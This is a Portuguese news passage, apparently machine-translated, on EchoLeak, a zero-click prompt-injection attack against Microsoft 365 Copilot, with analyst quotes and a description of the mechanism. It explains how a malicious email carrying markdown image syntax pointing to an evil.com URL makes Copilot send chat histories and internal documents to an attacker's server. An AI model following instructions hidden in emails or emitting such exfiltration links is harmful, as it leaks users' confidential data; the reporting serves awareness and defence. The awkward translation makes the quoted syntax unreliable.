O primeiro clique zero clique tem como alvo o Microsoft 365 Copilot

“Esta é a pura arma da força central da IA, a compreensão contextual, contra a si mesma”, disse Abhishek Anant Garg, analista do QKS Group. “As lutas de segurança corporativa porque são construídas para um código malicioso, não a linguagem que parece inofensiva, mas age como uma arma”.

Esse tipo de vulnerabilidade representa uma ameaça significativa, alertou Nader Henein, analista do vice -presidente da Gartner. “Dada a complexidade dos assistentes de IA e serviços baseados em trapos, definitivamente não é o último que veremos”.

O mecanismo de exploração de Echoleak

O Echoleak explora a capacidade da Copilot de lidar com dados internos confiáveis ​​(como e -mails, bate -papos de equipes e arquivos onedrive) e entradas externas não confiáveis, como e -mails de entrada. O ataque começa com um e -mail malicioso contendo sintaxe de marcação específica, “Curtir! (Image alt text) (ref) (ref): https://www.evil.com?param=. ” Quando a Copilot digitaliza automaticamente o email em segundo plano para se preparar para consultas de usuários, ele aciona uma solicitação do navegador que envia dados confidenciais, como histórias de bate -papo, detalhes do usuário ou documentos internos, ao servidor de um invasor.